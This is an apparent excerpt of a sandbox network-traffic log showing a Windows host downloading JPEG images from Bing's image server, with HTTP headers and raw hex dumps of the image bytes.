2024-12-16 10:25:07 UTC	863	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 649123 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 4171B0F9EF0A4FC7BDC9740A9B9CE677 Ref B: EWR311000108011 Ref C: 2024-12-16T10:25:07Z Date: Mon, 16 Dec 2024 10:25:06 GMT Connection: close
2024-12-16 10:25:07 UTC	3517	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 34 3a 32 33 20 31 36 3a 33 36 3a 34 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 25.4 (Windows)2024:04:23 16:36:488C
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: df fa b9 65 93 ff 00 43 ac 1b 3b db 8d 6b c3 f2 8b 68 04 92 58 f9 1e 57 9b f7 37 ff 00 77 f0 ac df 1e 6b 76 d1 58 cb e1 cd 0e fb ca fe cb ff 00 90 ac b1 4d b1 2c d3 fb af 27 f7 9a bc 98 7b c7 a1 3f 70 e9 f5 4d 43 4e b6 9a ea 3b c9 ff 00 79 2f 97 1c 51 45 f7 ea b7 88 35 0b 8d 36 6f b1 e9 76 1e 6e a9 7d fb cf dd 7f 71 7f 8e 59 2b 92 f0 7e ad a2 df d8 f9 7a 1c 13 6b 37 11 4b f6 6f b5 7f a9 86 09 76 7d ff 00 9e b8 2f 8c de 28 f1 ca f8 bb fb 03 c2 2b 34 56 96 91 a4 ba f6 b5 2c 2f e7 5f cb ff 00 3e f1 7f d3 35 15 b4 29 fb e4 73 9e 87 a7 4d 7b 25 e4 b6 f1 ea 90 ea 9a 87 fa cd 42 ea 2d ff 00 64 b4 8b fe 78 c2 f5 b1 25 bc 6f e1 f9 74 bd 2f c9 97 cd 96 38 ee bc af dc f9 9f f3 d2 b9 ef 85 f7 12 7f c2 a3 b5 d7 2c 20 9a ea e3 54 ff 00 49 96 29 67 fd ce cd ff 00 df fe Data Ascii: eC;khXW7wkvXM,'{?pMCN;y/QE56ovn}qY+~zk7Kov}/(+4V,/_>5)sM{%B-dx%ot/8, TI)g
2024-12-16 10:25:07 UTC	4144	IN	Data Raw: a2 9d 45 06 63 68 a2 8a 00 28 a2 8a 00 28 a2 8a 00 6d 14 ea 28 01 b4 53 a9 b4 00 51 45 14 00 51 45 15 a0 05 14 51 40 11 d1 52 51 41 a1 1d 15 25 14 01 1d 14 51 40 05 14 51 40 05 14 51 40 11 d1 52 51 40 11 d1 52 51 40 11 d1 45 14 00 51 45 14 19 85 36 9d 45 00 36 8a 75 36 80 e4 0a 28 a2 a8 cc 28 a2 8a 00 6d 14 ea 28 01 b4 53 a8 a0 06 d1 45 14 00 54 75 25 14 01 1d 15 25 14 01 1d 15 25 14 01 1d 14 51 40 05 14 51 40 11 d1 52 51 40 11 d1 52 51 40 11 d1 45 14 00 51 45 14 00 51 45 14 00 da 29 d4 56 80 36 8a 28 a0 90 a6 d3 a8 a0 06 6c a6 54 94 50 07 9c fe d2 1e 38 b6 f0 7f 81 65 b3 f2 3e d5 a8 6b 3f e8 d1 45 2c 3b d3 67 f1 57 cb 57 9e 2b bd 7d 52 5b 38 f4 ad 33 ed 12 cb fe b7 c9 f9 3f ef 9f ef 7f bd 5e d3 fb 44 6a b6 da c6 a9 aa fe e2 6f f8 90 dd 25 b4 b7 51 7c 9e Data Ascii: Ech((m(SQEQEQ@RQA%Q@Q@Q@RQ@RQ@EQE6E6u6((m(SETu%%%Q@Q@RQ@RQ@EQEQE)V6(lTP8e>k?E,;gWW+}R[83?^Djo%Q\|
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: d7 b4 4f 88 36 ba 7e b9 fb a8 e5 97 f7 5a af 93 b2 1b b8 95 37 ee 8e 80 3d d7 c7 1a 0c be 2a f0 ff 00 99 24 f3 5d 49 6b 6b 27 d9 75 5b 48 7f 7d 27 fb 1b 1f ef d7 9b de 78 5f 49 d2 bc 3f a7 ea 1e 24 f1 1f d9 6d fc df f5 5f f2 db 7b 7f 07 97 fd ea ec 35 4d 4f 56 d2 bf e1 1f b7 92 fa 7b 5b 79 65 83 ed 5f c6 fb ff 00 bb f3 7f 96 a9 b4 fd 57 c2 9a 57 8d 2e b4 7b 3b eb 29 6f 35 eb af b4 da da cb 07 ef bc d6 fb fb 77 d6 9e c6 06 7e de a0 cf 84 f7 5a 4c da 2d d4 7e 1f d5 61 ba b7 b0 97 f7 5f 7d 3e ce 9f f3 cb e7 ad 2d 3a cb 5e b3 d2 ef e3 d2 e0 b2 b0 f3 7f 79 fb ab 27 9a 1f f8 02 7f 1d 65 7f 68 5b 68 fe 2e fe c3 d6 27 b2 b5 d3 e5 97 ed 32 c5 f2 27 99 bb ff 00 65 5a d8 d1 fc 41 a4 e9 b0 cb fd 9f e7 45 a5 da fe f2 29 6e e6 ff 00 8f 8f fa e7 bf ff 00 42 ab 99 14 cf Data Ascii: O6~Z7=*$]Ikk'u[H}'x_I?$m_{5MOV{[ye_WW.{;)o5w~ZL-~a_}>-:^y'eh[h.'2'eZAE)nB
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: a5 f2 bf fb 2a fa bb f6 57 f1 6c 7e 27 f8 6f fd 97 e4 79 57 9e 1c 97 ec d7 5f f3 c6 45 6f 9a 37 8b fd 9a be 7e 73 1e 4e 43 d2 a8 a2 8a 60 14 54 94 50 04 74 54 94 50 04 74 54 95 1d 00 14 51 45 00 14 51 45 00 14 51 45 00 36 8a 75 14 19 8d a2 9d 45 00 36 8a 75 36 a8 02 8a 28 a0 02 9b 4e a2 80 1b 4e a2 8a 00 6d 14 ea 28 01 b4 53 a9 b4 00 51 45 14 00 51 45 14 00 54 75 25 14 01 1d 15 25 14 01 1d 15 25 14 01 1d 14 51 40 05 14 51 40 05 47 52 51 41 99 1d 15 25 14 01 1d 15 25 14 01 1d 15 25 14 01 1d 15 25 14 01 1d 14 51 5a 00 51 45 14 00 51 45 14 00 51 45 14 00 da 29 d4 50 03 68 a7 51 40 0d a2 9d 45 00 36 8a 75 14 00 da 28 a7 50 03 68 a2 8a 00 28 d5 25 b6 b6 b2 fb 3c 7e 7c ba a5 d4 bf 66 b5 8b c9 ff 00 96 bf fc 48 a9 b4 fb 4b 9b cb df b3 db fe f6 4a 7e 8f a2 7d 8f Data Ascii: *Wl~'oyW_Eo7~sNC`TPtTPtTQEQEQE6uE6u6(NNm(SQEQETu%%%Q@Q@GRQA%%%%QZQEQEQE)PhQ@E6u(Ph(%<~\|fHKJ~}
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 10 4f 65 6b a8 5a dd 79 96 11 79 df 3d df 9b f3 3f fe 3d 58 c0 73 fe 63 dc 28 a2 9d 41 03 68 a7 51 40 0d a2 9d 4c d9 40 0b 51 d4 94 50 04 74 54 94 50 04 74 54 94 50 04 74 54 95 1d 00 14 51 45 00 14 51 45 68 01 45 14 50 01 51 d4 94 50 04 74 54 94 50 04 74 54 94 50 04 74 51 45 00 14 51 45 00 14 51 45 06 61 4d a7 51 40 0d a2 9d 45 50 0d a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a6 d3 a8 a0 06 d1 4e a2 80 1b 45 3a 8a 00 6d 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 11 d1 52 54 b6 16 57 17 73 79 70 41 e6 d1 ed 2c 05 6a b1 a6 d9 dc 6a 17 9e 45 a4 3e 63 8e a4 d2 e9 f6 bf 6c d5 25 b3 8e 78 7f 75 2f ef 65 fe 08 eb 52 eb c4 b6 7a 6f 86 2e ae 7c 39 65 0d d5 bd af ee fc cf b9 f6 a9 7f f6 7a e5 ad 5b 97 e0 36 a3 47 9b e2 2f d9 d8 69 5a Data Ascii: OekZyy=?=Xsc(AhQ@L@QPtTPtTPtTQEQEhEPQPtTPtTPtQEQEQEaMQ@EP(((NE:mQ@Q@Q@Q@Q@Q@Q@RTWsypA,jjE>cl%xu/eRzo.\|9ez[6G/iZ
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 9f c4 4f 17 fe ea 39 35 cd 4f ff 00 1c ae 9b c3 7f 17 75 28 47 97 ae 69 5f 6e ff 00 a6 b1 7e e6 6f fe 26 b3 9e 02 bc 0b 86 32 8c 8f 5c a2 b9 3d 2f e2 5f 83 2f 21 f3 3e dd 35 af fd 7d d9 ba 57 51 6f 35 b5 cc 31 5c 5b cf 0c b1 cb fe aa 58 ab 8e 71 9c 7e 23 78 4e 13 f8 49 28 a2 8a 82 c2 8a 28 a0 02 8a 28 a0 02 8a 48 d3 7f fa ba b9 6f a5 6a 33 7f cb 1f fb fb 47 3f 21 7e cf 98 a1 4f d9 be 99 79 7d a0 d9 fd ab ed 9a e4 31 7d 97 fd 6f 9b f2 57 39 aa f8 83 c1 7a 9a 9b 67 d5 75 1d 5e 0f 33 8b 0b 58 4a f9 8e be eb 8a 3d a0 72 1a f7 9a b6 93 6d 0c b2 5c 6a b6 51 47 17 ee e5 fd f6 ff 00 2f fe f9 ab 97 1f b9 b2 8a e2 48 26 fd ef fa a8 bf e7 a5 71 7a a7 8a fc 31 e1 0b 78 64 d1 74 4d 32 c2 49 71 1c 51 43 fb d9 a3 ff 00 9e 8f 27 f0 fc bf f7 d6 6b 93 d7 6f bc 55 e3 8f 10 Data Ascii: O95Ou(Gi_n~o&2\=/_/!>5}WQo51\[Xq~#xNI(((Hoj3G?!~Oy}1}oW9zgu^3XJ=rm\jQG/H&qz1xdtM2IqQC'koU
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: b8 7b fe ec 0e b6 e2 5f f9 67 ff 00 2d 25 a6 46 96 c9 0c 52 7f aa b8 b5 f3 3f 75 f7 fe 4f ef 6e ac 4f 0d f8 8e cb c4 90 ff 00 68 68 77 d3 4b e5 79 91 cb 6b fc 7f f0 28 fe f7 fc 09 6a e6 9f a8 5c 5b 58 f9 7f b9 fd ef fa df 2a 1d 94 7c 7f 08 fe 09 fb c5 f8 da 47 ff 00 a6 51 d3 ff 00 e5 b7 ee ff 00 75 27 fe 3f 54 3e db 2c df f3 db f7 5f ea a8 8e e2 5b 98 65 92 cf ce 8a 3f f5 92 d6 9c 86 7c e5 cb 8b 8b 6b 6b 29 6c ed e0 86 5f b5 7f c7 d7 9b 0f fa cf fe 2e 99 1d c6 ff 00 dd f9 fe 54 71 55 0d f1 ff 00 cf 7a 7d 9d f5 b2 5e fe ee fa 18 bf eb af fc b4 db fd ca cf 92 11 0e 79 c8 d2 b7 7d f3 7e f3 c9 ff 00 b6 b5 34 7a 87 d8 ec be c7 fe b6 3f f9 eb 2f ce f5 5a 37 17 93 4b 25 32 ce f6 d9 3f 77 fb 98 a4 ff 00 ae 3f 3d 05 f3 8f 92 6d fe 6f 97 fe ae 5f f5 b5 0d 9d bd bd Data Ascii: {_g-%FR?uOnOhhwKyk(j\[X*\|GQu'?T>,_[e?\|kk)l_.TqUz}^y}~4z?/Z7K%2?w?=mo_
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: df 1f 72 bd 17 e1 ff 00 8c 34 5f 16 c3 35 bd 9c ff 00 65 bc 8b fe 5d 65 fb fe 57 f7 b7 d6 6f 8c 3c 19 a4 f8 86 6b a9 35 0b 19 ac 2e 3c df 2e 2b ab 4f bf 71 fe d6 ca e1 ad fc 19 e3 8f 03 6b 51 6b 1a 5f 93 7f 1c 5f f3 cb fe 5a 27 fb 71 d7 1c fd b4 27 e4 7a 14 f9 27 03 d8 23 9b 56 4f 36 3b cb 1f b2 c7 fe ae 2f df 6f 4b 84 ab 37 89 e1 cd 7b ec b1 f8 82 c6 69 7e cb ff 00 2d 62 df bf 63 7c bf 79 79 aa 7a 3f 89 64 bc f0 f4 52 6a 96 33 58 5e 4b fe b6 29 be 4a b3 1e 9f b2 1f f4 3f f4 5f 37 fc ff 00 c0 2b 6f 67 cf 0f 78 c7 9f 92 7e e9 e6 fe 2c f0 0f 8b ed af 75 0b 8d 1e 09 af f4 78 bf e3 d7 cd 9b fd 3a 34 ff 00 80 ff 00 ac 5a f5 4f d8 9f 5d d4 5e 1f 17 f8 7e 39 e1 fe d0 f2 a3 d4 ac 3c df 93 ee fe e9 b7 fd 2b 9b d5 35 8f ec 1f 2a 3d 43 55 fb 07 da a5 f2 e2 fe e6 fa Data Ascii: r4_5e]eWo<k5.<.+OqkQk__Z'q'z'#VO6;/oK7{i~-bc\|yyz?dRj3X^K)J?_7+ogx~,ux:4ZO]^~9<+5*=CU
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: b1 ef 17 f6 fd d3 2b 5c 8b 56 fb 14 b6 fa 7e b9 e5 49 2f 97 24 52 f9 3f c7 fc 7e 67 f7 f7 d5 6f f8 49 7f b1 34 5f b3 ea 9a 1c de 67 fc f5 8a 6f b4 fc ff 00 dc f9 ab 63 54 48 a1 fb 2c 91 d8 cd 2d bc b2 c7 e6 cb 69 fd cf ef ae ff 00 ee d3 2e 22 8e ce 19 7f b3 e7 ff 00 a6 7f ba ff 00 d9 68 f7 24 1e fc 4d 8f 07 ea 5a 6e b1 e1 ff 00 32 3b 1f 2a 3f 37 fe 7b 3e fd ff 00 ed 53 3c 51 a6 e9 df d9 7f da 97 90 59 45 71 e5 79 7f 6a 8a 1f fd 19 ff 00 c5 57 13 71 7b aa e8 fe 20 fb 3d c5 8d ef d8 ef e5 8f ca d4 34 ff 00 f9 66 8b f2 be ff 00 f9 e6 db ab 63 fb 56 38 7c db 7f ed 5f b7 ff 00 cf 5f b5 cc ff 00 fa 0d 47 24 e4 5f b6 84 7c 8d 2f 87 16 57 36 7f 16 fc 2b 79 e7 c3 e5 ff 00 6a c7 e5 7f c0 ab e9 e8 fc 49 e1 c9 a6 ba 8e df c4 5a 2c bf 61 97 cb ba ff 00 4c 4f f4 7a f9 Data Ascii: +\V~I/$R?~goI4_gocTH,-i."h$MZn2;*?7{>S<QYEqyjWq{ =4fcV8\|__G$_\|/W6+yjIZ,aLOz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49763	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:07 UTC	346	OUT	GET /th?id=OADD2.10239381718311_1O3ACXF8KC2UFP8NW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:07 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 519739 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 59F9E65B7F784B77B92F301EE619695A Ref B: EWR30EDGE1407 Ref C: 2024-12-16T10:25:07Z Date: Mon, 16 Dec 2024 10:25:06 GMT Connection: close
2024-12-16 10:25:07 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 13 4a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 32 35 3a 30 34 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``JExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:25:048
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 1b 03 8a 32 4f 14 ec 24 2f 3b 73 9e 94 29 05 40 c8 c5 26 0e dc 7f 2a 4c 76 1d 7d bd 29 d8 2e 0e a4 2e 68 00 16 c1 19 c7 34 11 8c 13 48 08 1c d0 4d c3 00 b1 27 a0 f4 14 8c b9 5c e0 64 53 ba ae 05 0d 9e 71 4c 08 f6 fc c4 0e 45 3b 6e 73 4f 07 e6 c8 e7 8a 09 c7 39 e3 a0 a0 08 82 e3 a5 3b 6e 29 41 cf 1e f4 bc 74 3f 8d 00 34 2d 37 1b 5b 15 2f 5c 1a 6e 72 c3 3d 28 0b 08 01 dd ed eb 48 47 38 eb 4f c8 ef c1 a4 24 76 3c 1a 60 31 46 30 68 c7 e5 4e ce 32 0d 0c 71 8c 01 ee 69 80 d2 08 eb da 8c 63 9f 5a 55 27 b7 7a 42 46 ef 7a 04 35 a8 c7 73 d2 95 bd 68 6a 04 20 03 ea 69 b8 34 ec 01 4b ef d2 81 dc 69 18 e3 14 bd 79 34 73 4a 07 ad 02 43 56 93 19 a7 63 b0 a3 19 5e 28 01 a0 12 dc 51 8c 53 b0 28 c0 a0 06 91 8a 31 de 9c 78 e9 46 3e 5e 68 01 8a 33 4b 4e 03 2b 81 46 05 31 0d Data Ascii: 2O$/;s)@&*Lv})..h4HM'\dSqLE;nsO9;n)At?4-7[/\nr=(HG8O$v<`1F0hN2qicZU'zBFz5shj i4Kiy4sJCVc^(QS(1xF>^h3KN+F1
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 92 b6 ba 96 b7 02 cc 14 f3 8c ff 00 4a 1a 30 7e f9 3c 7b 63 da a3 b6 52 5c 33 70 40 c6 3b 71 eb 52 f5 f7 e3 9f 4a 1e 8c 6a 57 5a 82 90 ac 7d f0 29 1f 9c 02 01 c9 e8 68 52 5b 81 e9 4a 72 1b 9c 1f 5a 90 e6 76 18 63 53 c9 40 08 a4 0e b1 e7 6e d0 00 c9 c5 2b 3b 19 36 20 fc 68 8d 36 b6 78 c8 aa e9 a9 2a 4c 74 32 4a 57 2f c0 3d 00 eb 8a 18 b3 37 53 fd 29 40 cb 67 39 04 52 e7 1c 1c 7e 15 3d 4b d4 6a 10 3e f2 74 e3 f1 a5 0c dd 08 c8 f4 a9 42 67 93 c8 e9 d6 92 44 1d 30 31 8c fd 28 e6 45 24 ec 02 54 5c 79 68 06 3b 9a 96 1d 42 58 fe e9 3c f6 07 8a 85 51 4a f5 ff 00 22 9c b1 00 c0 87 e3 d2 a5 a8 75 2a 32 9a d8 d0 6d 4d 8d b8 61 2a 96 3d b6 f3 4e 8b 53 91 d3 3f bb 0d ee 31 59 6a 83 7e d1 d7 38 18 a7 c3 85 47 0c 7f 21 d6 b1 74 61 6d 8d 55 69 1a 02 fa ed d5 8e 23 5c 0e Data Ascii: J0~<{cR\3p@;qRJjWZ})hR[JrZvcS@n+;6 h6xLt2JW/=7S)@g9R~=Kj>tBgD01(E$T\yh;BX<QJ"u2mMa*=NS?1Yj~8G!tamUi#\
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 46 24 62 a7 76 4f 6f c2 9b e7 90 b9 19 c6 3a 7d 29 72 c8 6a c4 de 52 05 1c f2 7b e7 38 cd 38 a2 8c 8e 07 27 07 ad 57 8a e4 8c 02 87 1e 83 d6 9c 26 25 09 3c 8f 4e f9 a1 c6 45 29 2e 84 a1 3f 79 c7 dd 34 ad 03 16 ea b8 f6 e3 8a ae 27 21 b8 dd f8 0e d4 f6 99 cf 50 57 ff 00 ad de 8e 59 5c 4a cc 5f 28 86 e9 cf f7 a8 f2 9b 83 81 8f 4a 24 9e 40 b8 07 27 d2 a3 f3 4e e2 4f 5e c2 9d a4 2d 11 28 89 79 08 70 48 e0 52 08 f0 dc 71 f8 75 a8 d6 52 17 8e a7 f5 a7 79 ac 30 17 83 d8 d1 69 06 83 bc b6 2b 93 fa d0 a8 42 fa 0c 54 6d 2c 8b 9f 53 de 92 4b 97 08 15 87 07 da 8e 59 09 b8 93 a4 40 b6 4e 0d 35 90 2b 1e 39 cf a5 42 d2 b7 18 e4 fa 53 96 56 db f7 0e 7f 1a 39 64 3e 64 4c e0 1c e4 05 e8 78 ef 40 51 bb 80 bc f3 c5 41 e7 b1 5c 94 e8 3a e2 91 66 2c c4 51 ca c5 cc ae 59 f2 d7 Data Ascii: F$bvOo:})rjR{88'W&%<NE).?y4'!PWY\J_(J$@'NO^-(ypHRquRy0i+BTm,SKY@N5+9BSV9d>dLx@QA\:f,QY
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: c8 01 b1 8e 7a d3 bc 8f f6 69 5c 7b 68 51 db 8c 64 67 de 8c 9e 01 4e 2a f1 83 18 1b 3f 0a 3c 91 d0 00 38 a6 a5 6d c5 62 98 20 2e 71 d7 da 80 e0 73 b3 9c f6 15 70 db 80 b8 c0 cd 1f 67 07 f8 3e 5e f4 f9 85 6b 94 dd bb ec fe 74 d0 e3 69 05 07 1c f3 57 7e cc bb 7a 71 cd 1e 40 ec bf 85 17 40 53 0f 95 19 c6 31 e9 4f e3 9d d9 c7 5a b1 e4 8e c0 66 9c 20 f9 7f d5 f1 ee 28 b8 6e ca 79 e8 4e 69 57 1b 73 ce 6a df 90 3b a0 14 79 44 1c 81 45 c3 cc ac a4 1e a9 46 72 b8 31 fe 55 6f ca cf 40 38 a3 ca 1d 0e 33 40 59 a5 72 99 5c f6 3f 4a 70 42 57 20 35 59 11 7c b9 1f 85 2f 95 f3 60 77 f7 a1 b1 45 58 ac 62 21 b2 01 34 e4 1f ec 1e 3d ea cf 93 8f 5e 47 5a 3c a2 57 22 95 f4 1e a5 7d 80 a8 1b 31 f8 d3 5a 3c f4 4f d6 ac 98 fd 4e 7d fd e9 76 10 70 78 02 92 61 66 55 28 77 60 e3 3f Data Ascii: zi\{hQdgN*?<8mb .qspg>^ktiW~zq@@S1OZf (nyNiWsj;yDEFr1Uo@83@Yr\?JpBW 5Y\|/`wEXb!4=^GZ<W"}1Z<ON}vpxafU(w`?
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 49 e8 78 22 a3 23 a3 63 39 e9 4b cf 61 fa d1 a0 6a 90 f5 24 f0 71 4a 41 ee 79 ed 51 83 86 3e bd e8 c9 3c 0e bd b8 a0 39 bb 12 8c 8e 39 a4 62 07 07 e9 d6 98 19 83 0c d2 e5 b9 ff 00 38 a4 36 ac 3b 3e e7 8e 28 ce 3d 2a 30 c4 7c b8 3d 69 c1 b2 c4 71 4a cf 72 79 90 f0 70 d9 18 a7 02 7d aa 12 09 c8 00 7a 8a 76 ec e3 20 8f 7a 7a 15 16 3c 9c 50 49 0d f5 c5 37 76 5b 9e fe f4 67 3d 0f e3 53 66 09 dc 76 73 92 3a fa d2 e7 1c 67 93 da 99 fc 58 1d 7f a5 01 88 5e 3a d0 0c 7a 9e e4 e0 8a 5f 31 b7 76 a8 cb 16 19 18 cf b9 a0 16 f4 27 1e e2 8d 45 72 65 73 e9 c7 a5 2f 9a 07 51 51 67 1c 72 73 46 ee db 4f e3 ed 46 a0 ac 48 b2 8e bd cd 05 d7 66 71 cd 46 8d dc 8c 7a d2 93 9c 9e c2 9d ec c1 c6 e8 7e 54 f5 02 97 31 f6 e2 a2 c8 e8 1a 9c 1f 38 00 f3 4f 98 5b 0f c2 ee 23 34 85 54 72 Data Ascii: Ix"#c9Kaj$qJAyQ><99b86;>(=*0\|=iqJryp}zv zz<PI7v[g=Sfvs:gX^:z_1v'Eres/QQgrsFOFHfqFz~T18O[#4Tr
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 24 9a 40 b8 fb a0 e4 1a 0a 8c 90 80 38 5e 70 68 f9 83 74 fa 53 8f 2b 81 82 7d e9 72 47 f2 a5 71 f3 58 67 cc 3a 8e 07 3c d1 8f 51 c1 ef 4e 24 9e 3a 9a 72 91 de 9d f4 16 a3 00 01 b1 d0 52 7f 10 cd 49 ea 71 c1 a8 cb 75 01 0d 51 32 95 80 85 eb 4b 8e 98 1d 29 57 69 5c ec e3 de 8e 37 64 74 a4 1a 8c 03 bd 29 52 78 6a 79 50 70 72 7f 0a 0a 9d df ec 8a 3a 8d ea 30 29 e8 3a 52 8d fb 7a e3 fc 29 50 11 9c 50 02 96 c7 53 40 b5 d0 45 c9 c1 e1 bd 29 48 61 c8 14 ec 01 cf 53 e8 28 3c f5 39 f5 a0 15 90 df 9b 6f 38 a0 03 b7 06 9d 82 5b 04 71 df 14 9d 69 6b d0 ab 45 9c 73 2d ce d0 11 b1 8e 46 4d 36 34 bb 19 2f e5 9c 1e 2a e6 63 57 e7 93 f5 a5 5e 5c 80 83 93 c7 35 92 3b 3a 15 5a 39 db 82 fd 8e 3b 52 79 57 01 3e 69 71 f4 f5 ab 6c 18 a9 51 f2 e3 df 34 dc 32 f0 08 60 3b 6d a7 a1 Data Ascii: $@8^phtS+}rGqXg:<QN$:rRIquQ2K)Wi\7dt)RxjyPpr:0):Rz)PPS@E)HaS(<9o8[qikEs-FM64/*cW^\5;:Z9;RyW>iqlQ42`;m
2024-12-16 10:25:08 UTC	16067	IN	Data Raw: c9 da a4 f4 c8 cd 0e 1c 28 c4 a0 13 d7 03 14 ba 07 51 33 bb 27 f7 84 60 d3 0c 8c 14 90 c7 27 8c 9e 31 8a 76 5c e7 74 a5 f3 d5 71 8a 5c a9 7c 10 7a f3 ee 68 12 b0 2b 65 40 72 4b 1e 7e f6 28 11 4a 18 94 8c 0f 5c b7 eb 41 11 3f 06 22 58 7b e2 82 11 18 b7 94 e4 f4 e3 9c 50 99 2e c9 82 24 83 ef 60 7b 16 cd 20 59 11 b1 91 9c 1c f2 7b d4 91 95 19 20 9c fa d1 96 66 e1 f2 4f 39 3c 66 8f 30 b7 28 c1 8d e0 82 4b 74 c9 e9 cd 3b 1f 31 0c 47 4c 8e 3a 9a 76 65 0d 83 b4 0c f1 4d 7f 34 72 40 c7 eb 4d 30 db 51 c5 13 68 56 1c f7 23 8a 0c 47 76 72 dd 86 33 4d 21 8a fc d9 f7 15 1e d8 ca 95 00 91 db 9c d0 27 ad 87 ba fc a4 10 33 ce 39 ef ef 48 13 0d c2 29 e3 9f fe b5 35 11 4a 92 72 3d bb d3 d9 76 2f c8 99 24 f4 62 3f ad 2b 8e d6 5a 0a 55 42 01 95 19 c7 53 44 21 87 05 94 a9 f4 Data Ascii: (Q3'`'1v\tq\\|zh+e@rK~(J\A?"X{P.$`{ Y{ fO9<f0(Kt;1GL:veM4r@M0QhV#Gvr3M!'39H)5Jr=v/$b?+ZUBSD!
